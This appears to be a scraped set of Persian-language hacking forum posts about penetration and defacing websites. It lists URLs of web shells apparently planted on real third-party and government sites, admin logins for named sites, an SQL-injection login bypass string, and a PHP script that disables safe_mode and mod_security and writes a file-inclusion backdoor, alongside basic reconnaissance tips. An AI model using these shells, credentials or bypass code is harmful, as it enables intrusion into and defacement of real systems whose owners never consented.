rajaz

=))

http://gaelleleboulicaut.com/admin '=' 'or'

هر کدوم از مباحث بالا بسیار گستره هستند و روش های خاص خودشونو دارن سرچ کنید "دوره OWASP"

سلام خوشبختانه تست نفوذ تنها به sql injection ختم نمیشه و متاسفانه اکثر کاربران ایرانی همین sql injection رو یاد گرفتند شما میتونید روش های دیگه ای مثل : کوکی ها ، ورودی ها ، آپلودر و... رو مورد تست نفوذ قرار بدید

قابل ثبت در زون اچ www.veenayogakendra.com/admin/gallery/170664052alfav3-encoded.phtml

http://khokyanglocal.go.th/khokyanglocal/mainfile/alfav3-encoded.php

سلام ؛ مطابق فیلم آموزشی پیش برید اسکریپت اجرا میشه python script.py proxy.txt t.me/ch/1

همانطور که میدانید اولین مرحله در هکینگ و تست نفوذ پیدا کردن اطلاعات کامل از هدف میباشد که اصطلاحاً به این کار Foot Printing میگوییم . یکی از عمده مراحل footprinting شناسایی سیستم عامل هدف است که ما میتوانیم بر اساس سیستم عامل سرور حملات خودمونو اجرا کنیم . روش اول : با استفاده از ping ما با استفاده از این روش میتوانیم خیلی راحت نوع سیستم عامل را به دست بیاریم . دستور ping iran-cyber.net اگر TTL دستور ما کم تر 64 بود سیستم عامل لینوکسی است اگر TTL دستور بین 64 تا 128 باشد سیستم عامل ویندوزی است و اگر بیشتر از 128 باشد سیستم عامل متفرقه میباشد . مشکلی که این کار دارد میتواند ما را به دام بیندازد چون رد پایی از خودمون به جا میگذاریم ؛ از روش های دیگه ای مانند سایت های آنلاین هم میتوانیم بهره بگیریم دو سایت زیر میتوانند علاوه بر سیستم عامل مصرفی تارگت اطلاعات دیگری مثل ایپی ، اطلاعات SSL ، وب سرور ، تکنلوژی های به کار رفته در صفحه وب و... را به ما بدهند . https://toolbar.netcraft.com https://www.shodan.io همچنین ما میتوانیم از ابزار NMAP کمک بگیریم

بخورید بیاشامید ولی دیفیس نکنید http://jdlsociety.com/uploads/file/b374k%20v2.7.php

دولتی http://ibook.bteb.gov.bd/uploads/1.php

http://korea-avtotrade.com.ua/media/upload/ay.php

راه های زیادی هست اما باید همشونو امتحان کنید ، اتفاقاً چن وقت پیش به یک سرور اینطوری برخوردم اما با php.ini بایپس شد . اگر قابلیت آپلود یا ادیت php.ini رو دارید کد زیر رو قرار بدید safe_mode = OFF disable_functions = NONE open_basedir = NONe [spoiler=.php] <html> <b><center><h2> <font color="#00ff00"> Safe_Mode Off By <font color="#ff0000"> Solt6n</b> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <style type="text/css">BODY { BACKGROUND-COLOR: #000000 } </html> <?php $php = fopen("php.ini", "w"); $entry_line=' safe_mode = Off '; fputs($php, $entry_line); fclose($php); $ini = fopen("ini.php", "w"); $ini_line=' <?php echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GET["file"]); ini_restore("safe_mode"); ini_restore("open_basedir"); echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GET["ss"]); ?>'; fputs($ini, $ini_line); fclose($ini); $hta = fopen(".htaccess", "w"); $hta_line=' <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule>'; fputs($hta, $hta_line); fclose($hta); ?> و در اخر این تاپیک هم ببینید https://iran-cyber.net/forums/threads/bypass-disable-function.2046/

http://voc.co.in/admin admin:admin123

http://ejcpl.net/wordpress/wp-admin rajaz:rajaz http://ejcpl.net/wordpress/wp-content/plugins/gutenberg/build/1.php